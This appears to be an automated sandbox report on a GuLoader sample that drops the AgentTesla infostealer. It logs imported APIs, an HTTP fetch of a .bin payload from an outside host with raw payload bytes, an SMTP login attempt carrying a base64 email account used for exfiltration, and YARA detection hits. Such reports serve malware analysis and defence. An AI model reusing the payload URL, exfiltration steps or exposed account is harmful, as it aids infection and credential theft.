                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                  Version Infos

                                  DescriptionData
                                  ProductNameWadiesant
                                  FileDescriptionUnpackagedfotomo
                                  FileVersion19.29.0
                                  CommentsCHONDROITI
                                  CompanyNameConteketra
                                  Translation0x0409 0x04b0

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2022 20:56:40.121280909 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.135859966 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.136087894 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.136708021 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.153284073 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174237013 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174325943 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174374104 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174420118 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174436092 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174478054 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174484015 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174557924 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174563885 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174606085 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174653053 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174685001 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174698114 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174707890 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174745083 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.174818039 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.174881935 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.188440084 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.188500881 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.188679934 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.188827991 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.188889027 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.188939095 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189019918 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189040899 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189063072 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189126968 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189172983 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189218044 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189225912 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189264059 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189265013 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189311028 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189357042 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189378023 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189402103 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189415932 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189449072 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189495087 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189532042 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189539909 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189569950 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189585924 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189631939 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189677954 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189688921 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189723969 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.189727068 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189870119 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.189908028 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205387115 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205545902 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205607891 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205625057 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205673933 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205719948 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205735922 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205765963 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205811977 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205857992 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205878973 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205903053 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205949068 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205950975 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205996037 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205998898 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206042051 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206058025 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206089020 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206134081 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206180096 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206221104 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206224918 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206269026 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206270933 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206319094 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206367016 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206387997 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206413984 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206425905 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206460953 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206526995 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206543922 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206592083 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206598997 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206636906 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206682920 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206687927 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206728935 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206773996 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206820011 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206867933 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206917048 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206994057 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.209398985 CEST804976150.7.115.119192.168.11.20

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2022 20:56:39.557692051 CEST5368153192.168.11.201.1.1.1
                                  May 27, 2022 20:56:40.112021923 CEST53536811.1.1.1192.168.11.20
                                  May 27, 2022 20:58:17.623646021 CEST5995953192.168.11.201.1.1.1
                                  May 27, 2022 20:58:17.871989965 CEST53599591.1.1.1192.168.11.20

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  May 27, 2022 20:56:39.557692051 CEST192.168.11.201.1.1.10x6bdeStandard query (0)artist151sh.comA (IP address)IN (0x0001)
                                  May 27, 2022 20:58:17.623646021 CEST192.168.11.201.1.1.10x9b21Standard query (0)mail.paralikgroup.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 27, 2022 20:56:40.112021923 CEST1.1.1.1192.168.11.200x6bdeNo error (0)artist151sh.com50.7.115.119A (IP address)IN (0x0001)
                                  May 27, 2022 20:58:17.871989965 CEST1.1.1.1192.168.11.200x9b21No error (0)mail.paralikgroup.com173.254.28.216A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • artist151sh.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.11.204976150.7.115.11980C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  TimestampkBytes transferredDirectionData
                                  May 27, 2022 20:56:40.136708021 CEST10517OUTGET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Host: artist151sh.com
                                  Cache-Control: no-cache
                                  May 27, 2022 20:56:40.174237013 CEST10518INHTTP/1.1 200 OK
                                  Date: Fri, 27 May 2022 18:56:40 GMT
                                  Server: Apache
                                  Last-Modified: Fri, 27 May 2022 14:17:16 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 221760
                                  Content-Type: application/octet-stream
                                  Data Raw: 26 a4 27 e7 4a b4 a0 c7 06 04 e5 1c 43 72 a8 95 7f 12 5d e9 b1 d8 3c 61 d6 ee 7e c6 84 ba d7 85 30 e1 b4 f5 be 0e 9a 07 af 44 43 79 05 26 17 13 4e b3 cc 6d c5 d3 d0 0f cb a9 91 43 5d c5 39 02 7a 96 fd a5 df 50 99 63 94 11 a1 fe 7a 43 28 55 63 90 d0 d6 a2 2e 15 5f 64 cd 99 a8 85 91 9f c9 e7 c3 fb 74 1e a3 51 df e3 dd e8 c3 8c a4 fc 81 aa 10 15 cb 43 b8 2f 5a 41 08 7b 9a f1 8b fa 4f ae fb 57 9d a4 9f 99 84 74 c2 b8 8f 3c 07 15 bb 79 18 85 7a 4d ff ae 98 b6 29 6f 99 a3 69 d9 7e 8f a8 b8 f4 9f 17 59 92 8a 24 03 d0 52 31 51 3e df d6 e7 93 90 06 1b fe ac eb 26 76 9d 51 4b 36 b1 73 d8 d6 b9 52 ae 5f 7a d5 d8 b9 ea 3e 32 94 3e 27 88 f5 fe 58 f2 96 a8 2c b1 4d 0f 91 d8 64 ad 61 ce 0b d5 ad 31 e2 32 2a b5 d1 16 7e 98 bb 4b 22 c4 6c 5a d7 c3 a9 70 74 73 5b ab bc 31 17 cf 06 41 d4 01 81 90 fa c1 cc 14 90 e6 b0 34 b9 58 1b 5b dc 54 59 87 7c 0b 2b 27 2f f7 c8 f1 74 01 43 c8 d4 d6 70 8a b8 cd bf ac 97 4e 47 82 89 70 be 50 81 33 48 dd 1d 65 2b 95 b8 2f 41 9e 79 93 5e c4 ec a3 22 dc 80 6d b7 69 80 1e d6 7d ed e1 cf 6b 8e 4e 1a 78 f1 00 a7 12 cc 3e 5b d7 d6 d9 2e ba 50 ca 90 82 7c 05 d3 d1 16 28 79 90 91 fc 0f b4 97 63 bb e6 1b 19 c9 ef cd 5b e9 f0 25 78 71 84 e2 d9 bf 44 27 65 2c e1 d8 21 90 5a 2d 43 b5 8a 2b 6f f7 b3 ba 30 a3 07 80 be a7 5f d5 13 74 d3 58 b1 d8 02 0a 3c a9 d0 1e ff 6f 89 90 0e 12 4d 48 a6 cc b4 1f 31 7f 75 62 05 c7 03 d0 5c 76 5f 25 4e 57 45 da e7 99 ad 66 c9 85 f0 71 cb e6 b0 e6 2d 65 57 ba fa 6a db be 61 b2 50 43 93 2f 42 dd ad ea b1 e0 09 86 69 71 0b b6 23 b5 77 6d 07 c9 17 1a c5 ea 5f 97 23 0f 4b 34 73 6c c9 9a 9a d3 6e 50 29 2a 02 b5 eb 4d c0 c6 b7 e3 49 5a a9 da 08 f0 4a 11 95 67 de 67 e0 bf 02 84 ec 5f 24 49 1b 5a 80 a5 e3 cf 72 d3 68 47 66 b6 fa 49 63 d9 8a 78 c2 53 63 09 f7 5a 90 45 09 06 59 44 9f f9 ac 0a 16 79 4c d0 57 b6 4c 36 8d ea 6b 43 9a 32 c6 93 c6 8e e2 c2 0d d2 e4 06 da 32 ff ed 21 40 b9 cf 23 e2 b6 70 9c 12 29 cb 50 ea 3c 34 b6 a4 5a c0 71 78 1f 37 84 66 9f e3 8e 7e 5a 05 9d 72 c8 b8 96 ad e2 ef 1e 79 6a 93 59 e7 c3 35 4c 77 21 aa c6 e9 6d 12 6c ab e1 a1 38 cb 10 8c 99 43 ea 4d 80 60 ee e4 2d 8b f3 91 ab 72 2e ca fd 2d b1 9f ba c0 34 13 2e 96 4d 77 d9 4a ce 1d ae bf 29 81 74 92 df 92 a0 04 86 f3 5a 83 39 e4 f0 5c 18 7c 74 ea 8f ec f7 7b 31 32 a0 c9 68 1d 82 41 be c0 7a fc 5f 76 95 5c ce 62 47 02 61 0e 8c f1 af 24 6e 87 be 9c 26 ee 7c 1b 86 b5 60 88 83 73 9d 01 d8 09 e4 24 61 c2 c4 6d 68 89 9a a2 af 90 9d 85 2e 85 5c 3d 20 06 77 c5 77 13 74 3e 3e 93 78 c7 db 49 77 ef 50 80 c7 57 72 56 70 c1 0e b0 46 08 14 44 75 21 28 43 7e 02 d2 8e 7a c6 cb d9 c9 bc 86 26 de 12 ce 66 03 e1 74 f5 f2 97 ad 19 1b ea d0 12 57 55 ad 88 80 b1 99 36 56 53 ea cb 8e 91 31 fa 9f ed 0f c4 0b c5 13 75 9f 78 34 c6 de 9b eb c7 16 79 57 f7 b4 07 93 bf 0f 45 48 ce 0e a5 9a c9 8f 23 15 f4 f9 18 52 44 57 e3 16 aa 51 e4 b3 76 41 42 1b 84 67 00 dc 14 77 9a 43 e7 ae f7 c4 1d 2a 5c 55 b4 ce 9f ae cb f9 a6 2f fa e8 c1 c4 91 9f 3c e7 76 a5 db 47 67 62 bc 13 b9 f5 85 bb 3e ab da bc d2 c1 a9 2e 12 47 da cc b5 aa ae 93 b4 2a e5 c0 d3 65 1e a3 5b f7 f1 dd e8 c9 a6 a4 fc 92 9a 12 15 e3 43 b8 2f 5c 41 08 6a 8c 7a a0 e1 4f a7 f3 13 92 88 29 88 42 55 7d af 3d f0 0a 43 c4 1b 6b a2 12 c1 91 e5 e8 fc 46 64 19 c0 2f a4 11 fb 82 f0 82 8f 67 2c d0 aa 4d 6d f7 16 7e 13 08 b9 92 98 f6 b9 1c e8 f5 a4 e9 3e 7d 9d 56 5d c8 e0 1a da c1 fe 53 aa 47 20 c6 15 da c1 3c 19 77 ee 22 88 f5 1c 70 e4 97 a3 27 90 5e 3f cb db 4c ad 69 ce 03 d5 ad 20 f4 17 77 ad d1 11 49 66 ba 67 20 dc 67 5a
                                  Data Ascii: &'JCr]<a~0DCy&NmC]9zPczC(Uc._dtQC/ZA{OWt<yzM)oi~Y$R1Q>&vQK6sR_z>2>'X,Mda12*~K"lZpts[1A4X[TY|+'/tCpNGpP3He+/Ay^"mi}kNx>[.P|(yc[%xqD'e,!Z-C+o0_tX<oMH1ub\v_%NWEfq-eWjaPC/Biq#wm_#K4slnP)*MIZJgg_$IZrhGfIcxScZEYDyLWL6kC22!@#p)P<4Zqx7f~ZryjY5Lw!ml8CM`-r.-4.MwJ)tZ9\|t{12hAz_v\bGa$n&|`s$amh.\= wwt>>xIwPWrVpFDu!(C~z&ftWU6VS1ux4yWEH#RDWQvABgwC*\U/<vGgb>.G*e[C/\AjzO)BU}=CkFd/g,Mm~>}V]SG <w"p'^?Li wIfg gZ


                                  SMTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  May 27, 2022 20:58:18.478101015 CEST58749777173.254.28.216192.168.11.20220-just2018.justhost.com ESMTP Exim 4.94.2 #2 Fri, 27 May 2022 12:58:18 -0600
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  May 27, 2022 20:58:18.478562117 CEST49777587192.168.11.20173.254.28.216EHLO 927537
                                  May 27, 2022 20:58:18.636542082 CEST58749777173.254.28.216192.168.11.20250-just2018.justhost.com Hello 927537 [84.17.52.2]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-PIPE_CONNECT
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  May 27, 2022 20:58:18.638015032 CEST49777587192.168.11.20173.254.28.216AUTH login ZnVnZW4ub3prdW50QHBhcmFsaWtncm91cC5jb20=
                                  May 27, 2022 20:58:18.796086073 CEST58749777173.254.28.216192.168.11.20334 UGFzc3dvcmQ6
                                  May 27, 2022 20:58:20.164119959 CEST58749777173.254.28.216192.168.11.20535 Incorrect authentication data
                                  May 27, 2022 20:58:20.165282965 CEST49777587192.168.11.20173.254.28.216MAIL FROM:<fugen.ozkunt@paralikgroup.com>
                                  May 27, 2022 20:58:20.323039055 CEST58749777173.254.28.216192.168.11.20550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:1
                                  Start time:20:56:12
                                  Start date:27/05/2022
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
                                  Imagebase:0x400000
                                  File size:657569 bytes
                                  MD5 hash:E2E4196B84FDF8956BAA7F99B11812AF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Target ID:3
                                  Start time:20:56:26
                                  Start date:27/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
                                  Imagebase:0x730000
                                  File size:108664 bytes
                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  General

                                  Target ID:4
                                  Start time:20:56:26
                                  Start date:27/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d9510000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Disassembly

                                  No disassembly